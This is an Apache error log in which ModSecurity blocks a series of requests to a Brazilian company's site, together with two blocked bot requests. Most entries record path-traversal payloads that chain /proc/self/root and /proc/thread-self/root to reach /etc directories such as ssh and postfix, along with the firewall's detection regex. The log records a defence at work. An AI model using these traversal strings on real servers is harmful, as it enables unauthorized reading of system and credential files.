[Wed Mar 18 08:26:03.274783 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:59590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLywkwaGbbGflqUZD4WAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:04.566355 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:59594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLzOoXxyEfFpUF8f9WbAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:05.903647 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:59596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqLzeoXxyEfFpUF8f9WbwAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:08.272961 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:59598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL0NY0UrI5A3LftIyHtgAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:09.695449 2026] [:error] [pid 15051:tid 140411725141760] [client 74.7.243.128:49328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL0SmAPhZkrhU8w4lVFgAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:14.268822 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.243.128:49338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL1tY0UrI5A3LftIyHwwAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:15.670387 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:49346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL19Y0UrI5A3LftIyHyAAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:22.622587 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:49358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL3tY0UrI5A3LftIyH2AAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:24.792750 2026] [mime_magic:error] [pid 15826:tid 140411624429312] (70014)End of file found: [client 57.141.18.104:34736] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 08:26:32.619027 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:54950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL6OoXxyEfFpUF8f9WhwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:38.727198 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:49158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL7kzinOy1jxa1j4f62wAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:49.459489 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:38126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqL-UzinOy1jxa1j4f65AAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:58.527638 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:36566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMAuyqAr6etmhZHNqljAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:26:59.862384 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:36970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMA9Y0UrI5A3LftIyH8wAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:27:00.462749 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.241.31:36294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMBEzinOy1jxa1j4f68wAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:27:01.199388 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:36972] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMBeyqAr6etmhZHNqlkwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:27:17.022924 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:55014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMFQkwaGbbGflqUZD4jQAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:28:00.267805 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.244.43:54114] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqMQOyqAr6etmhZHNqlzgAAAE4"]
[Wed Mar 18 08:28:04.914822 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.228.61:52468] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqMROyqAr6etmhZHNql0gAAAEc"]
[Wed Mar 18 08:28:50.463200 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:45070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMctY0UrI5A3LftIyIcQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:28:54.199538 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.241.31:39466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMdAkwaGbbGflqUZD4ywAAAMI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:28:54.204594 2026] [:error] [pid 30077:tid 140411699963648] [client 74.7.243.128:36982] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMdfu8EFLIOrSqIpvtfwAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:28:55.910918 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.241.31:39470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMd8df6f5d65gmYZS8HgAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:28:58.540719 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:51574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqMesdf6f5d65gmYZS8KAAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
